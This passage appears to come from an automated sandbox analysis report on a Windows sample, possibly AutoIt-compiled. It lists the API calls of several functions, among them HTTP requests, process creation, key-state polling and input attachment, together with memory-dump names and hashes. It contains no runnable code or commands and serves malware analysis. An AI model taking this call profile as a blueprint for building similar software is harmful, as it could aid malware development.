                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0066E40C
                                                                    • GetLastError.KERNEL32 ref: 0066E416
                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0066E483
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: 8e893735e33b90069638e5aed454c4b293709cc7a40e41194e509080a3ed2f36
                                                                    • Instruction ID: cb7360710ae5dd038fd2f69ea30456f85888f562cd417b660022277b16e72771
                                                                    • Opcode Fuzzy Hash: 8e893735e33b90069638e5aed454c4b293709cc7a40e41194e509080a3ed2f36
                                                                    • Instruction Fuzzy Hash: D1316139A002199FDB01EF68D945AFDB7F6EF55310F14802AE506EB391DA71AA02CB91
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0065B98C
                                                                    • GetDlgCtrlID.USER32 ref: 0065B997
                                                                    • GetParent.USER32 ref: 0065B9B3
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0065B9B6
                                                                    • GetDlgCtrlID.USER32(?), ref: 0065B9BF
                                                                    • GetParent.USER32(?), ref: 0065B9DB
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0065B9DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1383977212-1403004172
                                                                    • Opcode ID: f64573f02f48e3c4687c0b9803685700b71581fd4b6a4dc7e2d6b95412108285
                                                                    • Instruction ID: 85bda3f2b9dfbbfc6595ea866a9d3858952424f761ab43d59d8a9798fd5f1b1a
                                                                    • Opcode Fuzzy Hash: f64573f02f48e3c4687c0b9803685700b71581fd4b6a4dc7e2d6b95412108285
                                                                    • Instruction Fuzzy Hash: A421F574900104BFDB04ABA4DC86EFEBB76EF5A311F10111AFA52932E1DBB45819DF24
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0065BA73
                                                                    • GetDlgCtrlID.USER32 ref: 0065BA7E
                                                                    • GetParent.USER32 ref: 0065BA9A
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0065BA9D
                                                                    • GetDlgCtrlID.USER32(?), ref: 0065BAA6
                                                                    • GetParent.USER32(?), ref: 0065BAC2
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0065BAC5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1383977212-1403004172
                                                                    • Opcode ID: f999b9457e7da39384d57272994361df4dc992ab6a24f975a0dd1ddf04589fd3
                                                                    • Instruction ID: 911fd7ebc579aeb41515e6a9c76c0bfbf05c31c6a9afef7bd5832d28c233f6b7
                                                                    • Opcode Fuzzy Hash: f999b9457e7da39384d57272994361df4dc992ab6a24f975a0dd1ddf04589fd3
                                                                    • Instruction Fuzzy Hash: 4421B0B4A00108BFDB04AFA4DC85EFEBB7AEF45301F141019F952A7291DBB5591ADF24
                                                                    APIs
                                                                    • GetParent.USER32 ref: 0065BAE3
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 0065BAF8
                                                                    • _wcscmp.LIBCMT ref: 0065BB0A
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0065BB85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1704125052-3381328864
                                                                    • Opcode ID: 1afbc1e0906a24c4425efe699655658326a6f775fff095b5c3aef0c79bbe36e6
                                                                    • Instruction ID: 5fc1884b622257045d7a4575dd6b61acd198f39e16eb1474e4f7e4fe80260512
                                                                    • Opcode Fuzzy Hash: 1afbc1e0906a24c4425efe699655658326a6f775fff095b5c3aef0c79bbe36e6
                                                                    • Instruction Fuzzy Hash: BA110676608707FAFB246624DC17DE6379FDB21720F201026FE05E41D5FFE168564918
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0067B2D5
                                                                    • CoInitialize.OLE32(00000000), ref: 0067B302
                                                                    • CoUninitialize.OLE32 ref: 0067B30C
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0067B40C
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0067B539
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0067B56D
                                                                    • CoGetObject.OLE32(?,00000000,006AD91C,?), ref: 0067B590
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 0067B5A3
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0067B623
                                                                    • VariantClear.OLEAUT32(006AD91C), ref: 0067B633
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2395222682-0
                                                                    • Opcode ID: fe1861a29fbb3e821e9cb1569fa50723f006c8dde07c7734f7ab5a438b710072
                                                                    • Instruction ID: dc9e74c0b3c14a8e3671b84fd16aa0efacf44acab60c6e40f156ea61bdb4b1e9
                                                                    • Opcode Fuzzy Hash: fe1861a29fbb3e821e9cb1569fa50723f006c8dde07c7734f7ab5a438b710072
                                                                    • Instruction Fuzzy Hash: C2C123B1608305AFD700DF64C884A6BB7EABF89308F04995DF58A9B251DB71ED05CB52
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00664047
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006630A5,?,00000001), ref: 0066405B
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00664062
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006630A5,?,00000001), ref: 00664071
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00664083
                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,006630A5,?,00000001), ref: 0066409C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006630A5,?,00000001), ref: 006640AE
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006630A5,?,00000001), ref: 006640F3
                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,006630A5,?,00000001), ref: 00664108
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,006630A5,?,00000001), ref: 00664113
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: ad73b8b80d31306d153e789abac839f8afb5256aa0448771aa1cd079dc356b73
                                                                    • Instruction ID: d808e4b24511b81d2a94a2ccb8a8fe5e0d86abb1b30ff6a5d7c4c988e18ebc0c
                                                                    • Opcode Fuzzy Hash: ad73b8b80d31306d153e789abac839f8afb5256aa0448771aa1cd079dc356b73
                                                                    • Instruction Fuzzy Hash: DE3181B1500324ABDB10DF55DC8ABB9B7ABAB66711F209005F905DB390CFB4ED808F60
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 0063B496
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0063B4A0
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0063B4B5
                                                                    • GetStockObject.GDI32(00000005), ref: 0063B4BD
                                                                    • GetClientRect.USER32(?), ref: 0069DD63
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0069DD7A
                                                                    • GetWindowDC.USER32(?), ref: 0069DD86
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0069DD95
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0069DDA7
                                                                    • GetSysColor.USER32(00000005), ref: 0069DDC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 3430376129-0
                                                                    • Opcode ID: dc705eb548ef4d91ddb19a2c6a8fa21d000a5523013f1947abd92609c670f8e4
                                                                    • Instruction ID: fd65ae1ac261a98a53bdda45eb3a36f3f37e3bcebde8c1e942f6b3a64b83d33f
                                                                    • Opcode Fuzzy Hash: dc705eb548ef4d91ddb19a2c6a8fa21d000a5523013f1947abd92609c670f8e4
                                                                    • Instruction Fuzzy Hash: 96114C31500205AFDB216FA4EC08BE97BA7EB06325F10A665FA66955E2CB311942DF20
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006230DC
                                                                    • CoUninitialize.OLE32(?,00000000), ref: 00623181
                                                                    • UnregisterHotKey.USER32(?), ref: 006232A9
                                                                    • DestroyWindow.USER32(?), ref: 00695079
                                                                    • FreeLibrary.KERNEL32(?), ref: 006950F8
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00695125
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: 36050371de8710b7ec939f463a7d75a32d95db333cdc0aa68f9e57a2bd4cf1be
                                                                    • Instruction ID: 8d8e80b299ca81e7666b71e5f6e3aabafdb6fa693b0086ca936ff59dd8363ca3
                                                                    • Opcode Fuzzy Hash: 36050371de8710b7ec939f463a7d75a32d95db333cdc0aa68f9e57a2bd4cf1be
                                                                    • Instruction Fuzzy Hash: 1D914D30600A22CFCB45EF14D895AA8F3AAFF15304F5481ADE50A67762DF34AE56CF58
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0063CC15
                                                                      • Part of subcall function 0063CCCD: GetClientRect.USER32(?,?), ref: 0063CCF6
                                                                      • Part of subcall function 0063CCCD: GetWindowRect.USER32(?,?), ref: 0063CD37
                                                                      • Part of subcall function 0063CCCD: ScreenToClient.USER32(?,?), ref: 0063CD5F
                                                                    • GetDC.USER32 ref: 0069D137
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0069D14A
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0069D158
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0069D16D
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0069D175
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0069D200
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: 5755304d0e6221baed4fc18becfb72232b5f9bc10659a420e804d3b199b027ca
                                                                    • Instruction ID: d9bac798f4e842e0372dffb2bff0563341d540bcf5b3770a3a2b2e3dce02575a
                                                                    • Opcode Fuzzy Hash: 5755304d0e6221baed4fc18becfb72232b5f9bc10659a420e804d3b199b027ca
                                                                    • Instruction Fuzzy Hash: 8971EC31400205DFCF219F64CC81AEA7BBBFF49364F14526AFD566A6A6C7308842DFA0
                                                                    APIs
                                                                      • Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F
                                                                      • Part of subcall function 0063B63C: GetCursorPos.USER32(000000FF), ref: 0063B64F
                                                                      • Part of subcall function 0063B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0063B66C
                                                                      • Part of subcall function 0063B63C: GetAsyncKeyState.USER32(00000001), ref: 0063B691
                                                                      • Part of subcall function 0063B63C: GetAsyncKeyState.USER32(00000002), ref: 0063B69F
                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0068ED3C
                                                                    • ImageList_EndDrag.COMCTL32 ref: 0068ED42
                                                                    • ReleaseCapture.USER32 ref: 0068ED48
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0068EDF0
                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0068EE03
                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0068EEDC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                    • API String ID: 1924731296-2107944366
                                                                    • Opcode ID: d0b7720b07592b717d5acf79e96cd3f8ea3758a06d05904feb212e69d210a38b
                                                                    • Instruction ID: d702930df1061df152157eb5b35368cc4284865310f593b93fbfe6cd8d05c6ed
                                                                    • Opcode Fuzzy Hash: d0b7720b07592b717d5acf79e96cd3f8ea3758a06d05904feb212e69d210a38b
                                                                    • Instruction Fuzzy Hash: 26519870204304AFD710EF24DC9AFAA77E6AB89314F005A1DF9959B2E2DB71A944CF52
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006745FF
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0067462B
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0067466D
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00674682
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0067468F
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006746BF
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00674706
                                                                      • Part of subcall function 00675052: GetLastError.KERNEL32(?,?,006743CC,00000000,00000000,00000001), ref: 00675067
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                    • String ID:
                                                                    • API String ID: 1241431887-3916222277
                                                                    • Opcode ID: 352f2dfcba2893738c0b30324d54893f1b36d228974e920f2829b8d949bfab47
                                                                    • Instruction ID: f3ad44e0bcc5295e2f906732181e872f2e5d2260dd2da051834056c43baec9e0
                                                                    • Opcode Fuzzy Hash: 352f2dfcba2893738c0b30324d54893f1b36d228974e920f2829b8d949bfab47
                                                                    • Instruction Fuzzy Hash: C9417EB1501215BFEB059F50CC89FFA77AEFF09354F00801AFA0A9A251DBB0D9458BA4
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,006BDC00), ref: 0067B715
                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,006BDC00), ref: 0067B749
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0067B8C1
                                                                    • SysFreeString.OLEAUT32(?), ref: 0067B8EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                    • String ID:
                                                                    • API String ID: 560350794-0
                                                                    • Opcode ID: c0cb889ad6a60640c9a0ef566fa4b0a77cd9e7a90dab0f714f4aadefd69d7d24
                                                                    • Instruction ID: 5776060695d3900c852ec3d5a440729a7fff5b27864f614b994c1f683c0d6fe0
                                                                    • Opcode Fuzzy Hash: c0cb889ad6a60640c9a0ef566fa4b0a77cd9e7a90dab0f714f4aadefd69d7d24
                                                                    • Instruction Fuzzy Hash: 8CF10875A00219EFCF04EF94C884EAEB7BAFF49315F109459F919AB250DB31AE46CB50
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 006824F5
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00682688
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006826AC
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006826EC
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0068270E
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0068286F
                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006828A1
                                                                    • CloseHandle.KERNEL32(?), ref: 006828D0
                                                                    • CloseHandle.KERNEL32(?), ref: 00682947
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                    • String ID:
                                                                    • API String ID: 4090791747-0
                                                                    • Opcode ID: 7f3eae493641c66a2f54d74270e772a7a9e4a033240f0962a389418bb7a8081c
                                                                    • Instruction ID: b15eb37d0aeba58dacfc13df985e9bc0e40629d2c76dc6d3220f342ebe8ff06f
                                                                    • Opcode Fuzzy Hash: 7f3eae493641c66a2f54d74270e772a7a9e4a033240f0962a389418bb7a8081c
                                                                    • Instruction Fuzzy Hash: A6D1AF71604201DFCB54EF24C8A1A6EBBE6AF85320F14855DF9899B3A2DB30EC45CF56
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0068B3F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: 040c58dc2df1d7053b8fbac5664a1ad65b789f1da043983c71e5203fbbdd1026
                                                                    • Instruction ID: 3e798b1264e05f652df7754abbdf9bfca5e875d7305b8502f418db0daf9802f7
                                                                    • Opcode Fuzzy Hash: 040c58dc2df1d7053b8fbac5664a1ad65b789f1da043983c71e5203fbbdd1026
                                                                    • Instruction Fuzzy Hash: 3D51A230600204BFEF34BF28CC86BAD7BA7AB06314F646215F615E66E2C771E984DB55
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0069DB1B
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0069DB3C
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0069DB51
